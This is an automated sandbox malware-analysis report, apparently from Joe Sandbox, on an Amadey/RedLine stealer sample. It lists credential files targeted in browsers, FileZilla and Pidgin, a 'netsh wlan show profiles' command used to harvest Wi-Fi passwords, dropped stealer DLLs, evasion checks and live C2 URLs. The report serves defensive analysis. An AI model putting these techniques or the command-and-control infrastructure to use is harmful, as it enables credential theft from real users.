                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\wIaKimJFke.exeCode function: 0_2_004FC54A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,0_2_004FC54A
                                Source: C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exeCode function: 5_2_002A55B0 LookupAccountNameA,5_2_002A55B0

                                Lowering of HIPS / PFW / Operating System Security Settings

                                barindex
                                Uses netsh to modify the Windows network and firewall settings
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles

                                Stealing of Sensitive Information

                                barindex
                                Yara detected Amadeys Clipper DLL
                                Source: Yara matchFile source: 10.2.rundll32.exe.6e220000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
                                Yara detected Amadeys stealer DLL
                                Source: Yara matchFile source: 10.2.rundll32.exe.6e220000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0.2.wIaKimJFke.exe.4e0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 5.2.explorgu.exe.2a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.explorgu.exe.2a0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000003.1627718624.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000A.00000002.2870573139.000000006E221000.00000020.00000001.01000000.0000000A.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000002.2869343241.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.1694112022.00000000002A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000003.1653832811.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000000.00000002.1667895886.00000000004E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000005.00000003.1944154808.0000000004C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED
                                Tries to harvest and steal WLAN passwords
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
                                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profilesJump to behavior
                                Tries to harvest and steal browser information (history, passwords, etc)
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.jsonJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login DataJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.jsonJump to behavior
                                Tries to harvest and steal ftp login credentials
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
                                Tries to steal Instant Messenger accounts or passwords
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Roaming\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\oobe\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\SysWOW64\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Program Files (x86)\rpoxldIfutSmyWjJrKGUzQXqIbavYDpyIXciZSXTNiYVRuumgNVVmwgBnyWNY\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Temp\00c07260dc\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\System32\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xmlJump to behavior
                                Source: C:\Windows\System32\rundll32.exeFile opened: C:\.purple\accounts.xmlJump to behavior

                                Mitre Att&ck Matrix

                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                                Native API                                		1
                                DLL Side-Loading                                		1
                                DLL Side-Loading                                		1
                                Disable or Modify Tools                                		2
                                OS Credential Dumping                                		1
                                System Time Discovery                                		Remote Services1
                                Archive Collected Data                                		12
                                Ingress Tool Transfer                                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                CredentialsDomainsDefault Accounts2
                                Command and Scripting Interpreter                                		1
                                Scheduled Task/Job                                		112
                                Process Injection                                		1
                                Deobfuscate/Decode Files or Information                                		1
                                Credentials in Registry                                		1
                                Account Discovery                                		Remote Desktop Protocol2
                                Data from Local System                                		1
                                Encrypted Channel                                		Exfiltration Over BluetoothNetwork Denial of Service
                                Email AddressesDNS ServerDomain Accounts1
                                Scheduled Task/Job                                		Logon Script (Windows)1
                                Scheduled Task/Job                                		3
                                Obfuscated Files or Information                                		1
                                Credentials In Files                                		3
                                File and Directory Discovery                                		SMB/Windows Admin Shares2
                                Clipboard Data                                		2
                                Non-Application Layer Protocol                                		Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
                                Software Packing                                		NTDS225
                                System Information Discovery                                		Distributed Component Object ModelInput Capture112
                                Application Layer Protocol                                		Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                DLL Side-Loading                                		LSA Secrets761
                                Security Software Discovery                                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                                Masquerading                                		Cached Domain Credentials2
                                Process Discovery                                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items251
                                Virtualization/Sandbox Evasion                                		DCSync251
                                Virtualization/Sandbox Evasion                                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                                Process Injection                                		Proc Filesystem1
                                Application Window Discovery                                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                Rundll32                                		/etc/passwd and /etc/shadow1
                                System Owner/User Discovery                                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                                Behavior Graph

                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1417243 Sample: wIaKimJFke.exe Startdate: 28/03/2024 Architecture: WINDOWS Score: 100 49 Snort IDS alert for network traffic 2->49 51 Found malware configuration 2->51 53 Antivirus detection for URL or domain 2->53 55 12 other signatures 2->55 9 explorgu.exe 18 2->9         started        14 explorgu.exe 2->14         started        16 wIaKimJFke.exe 5 2->16         started        process3 dnsIp4 47 185.215.113.32, 49736, 49737, 49738 WHOLESALECONNECTIONSNL Portugal 9->47 35 C:\Users\user\AppData\Roaming\...\cred64.dll, PE32+ 9->35 dropped 37 C:\Users\user\AppData\Roaming\...\clip64.dll, PE32 9->37 dropped 39 C:\Users\user\AppData\Local\...\clip64[1].dll, PE32 9->39 dropped 41 C:\Users\user\AppData\Local\...\cred64[1].dll, PE32+ 9->41 dropped 67 Hides threads from debuggers 9->67 69 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->69 71 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 9->71 18 rundll32.exe 9->18         started        20 rundll32.exe 12 9->20         started        73 Antivirus detection for dropped file 14->73 75 Multi AV Scanner detection for dropped file 14->75 77 Detected unpacking (changes PE section rights) 14->77 87 2 other signatures 14->87 43 C:\Users\user\AppData\Local\...\explorgu.exe, PE32 16->43 dropped 79 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 16->79 81 Tries to evade debugger and weak emulator (self modifying code) 16->81 83 Tries to detect virtualization through RDTSC time measurements 16->83 85 Potentially malicious time measurement code found 16->85 file5 signatures6 process7 signatures8 23 rundll32.exe 25 18->23         started        57 System process connects to network (likely due to code injection or exploit) 20->57 process9 signatures10 59 Tries to steal Instant Messenger accounts or passwords 23->59 61 Uses netsh to modify the Windows network and firewall settings 23->61 63 Tries to harvest and steal ftp login credentials 23->63 65 2 other signatures 23->65 26 powershell.exe 26 23->26         started        29 netsh.exe 2 23->29         started        process11 file12 45 C:\Users\user\...\246122658369_Desktop.zip, Zip 26->45 dropped 31 conhost.exe 26->31         started        33 conhost.exe 29->33         started        process13

                                Screenshots

                                Thumbnails

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand

                                Antivirus, Machine Learning and Genetic Malware Detection

                                Initial Sample

                                SourceDetectionScannerLabelLink
                                wIaKimJFke.exe71%ReversingLabsWin32.Spyware.RedLine
                                wIaKimJFke.exe100%AviraTR/Crypt.TPM.Gen
                                wIaKimJFke.exe100%Joe Sandbox ML

                                Dropped Files

                                SourceDetectionScannerLabelLink
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll100%AviraTR/ClipBanker.rtyrx
                                C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll100%AviraTR/PSW.Agent.szlsq
                                C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll100%AviraTR/ClipBanker.rtyrx
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll100%AviraTR/PSW.Agent.szlsq
                                C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe100%AviraTR/Crypt.TPM.Gen
                                C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe100%Joe Sandbox ML
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll70%ReversingLabsWin64.Trojan.Zusy
                                C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll92%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe71%ReversingLabsWin32.Spyware.RedLine
                                C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll92%ReversingLabsWin32.Trojan.Amadey
                                C:\Users\user\AppData\Roaming\006700e5a2ab05\cred64.dll70%ReversingLabsWin64.Trojan.Zusy

                                Unpacked PE Files

                                No Antivirus matches

                                Domains

                                No Antivirus matches

                                URLs

                                SourceDetectionScannerLabelLink
                                http://pesterbdd.com/images/Pester.png100%URL Reputationmalware
                                https://go.microsoft.co0%URL Reputationsafe
                                https://contoso.com/License0%URL Reputationsafe
                                https://contoso.com/Icon0%URL Reputationsafe
                                https://contoso.com/0%URL Reputationsafe
                                http://185.215.113.32/yandex/index.php%100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phprsion100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpK100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/Plugins/clip64.dll1100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpg100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpVl100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.php2ab05100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpa100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.php:10100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/Plugins/clip64.dll&100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.php100%Avira URL Cloudmalware
                                http://185.215.113.32/ws100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpa2ab05100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/Plugins/cred64.dll100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpWindows100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.php?wal=1r100%Avira URL Cloudmalware
                                http://185.215.113.32/100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.php?wal=1tesf100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/Plugins/clip64.dll100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpn100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpp100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.php?wal=1&100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpa0100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.php?wal=1100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/Plugins/cred64.dll2100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpx100%Avira URL Cloudmalware
                                http://185.215.113.32/yandex/index.phpu100%Avira URL Cloudmalware

                                Domains and IPs

                                Contacted Domains

                                No contacted domains info

                                Contacted URLs

                                NameMaliciousAntivirus DetectionReputation
                                http://185.215.113.32/yandex/Plugins/clip64.dlltrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://185.215.113.32/yandex/index.phptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://185.215.113.32/yandex/Plugins/cred64.dlltrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://185.215.113.32/yandex/index.php?wal=1true
                                • Avira URL Cloud: malware
                                		unknown

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                http://nuget.org/NuGet.exepowershell.exe, 0000000B.00000002.2047365994.0000020057384000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmptrue
                                    • URL Reputation: malware
                                    		unknown
                                    https://go.microsoft.copowershell.exe, 0000000B.00000002.2050170977.000002005F3BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://185.215.113.32/yandex/index.php%explorgu.exe, 00000005.00000002.2870677611.00000000010D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://185.215.113.32/yandex/index.phpgexplorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        http://185.215.113.32/yandex/index.phpaexplorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://contoso.com/Licensepowershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://185.215.113.32/yandex/index.php2ab05explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://contoso.com/Iconpowershell.exe, 0000000B.00000002.2031780544.0000020048BEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://185.215.113.32/yandex/index.phprsionexplorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: malware
                                        		unknown
                                        https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 0000000B.00000002.2031780544.000002004893F000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://185.215.113.32/yandex/index.phpVlrundll32.exe, 00000007.00000002.2064247735.0000029F08E49000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://185.215.113.32/yandex/index.phpKexplorgu.exe, 00000005.00000002.2870677611.00000000010F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://185.215.113.32/yandex/Plugins/clip64.dll1explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          http://185.215.113.32/yandex/index.php:10explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          		unknown
                                          https://github.com/Pester/Pesterpowershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://185.215.113.32/yandex/Plugins/clip64.dll&explorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://185.215.113.32/yandex/index.phpWindowsexplorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://185.215.113.32/wsexplorgu.exe, 00000005.00000002.2870677611.0000000001106000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://185.215.113.32/yandex/index.php?wal=1tesfrundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://185.215.113.32/yandex/index.php?wal=1rrundll32.exe, 00000007.00000002.2064510181.0000029F0AE32000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            		unknown
                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 0000000B.00000002.2031780544.0000020047538000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
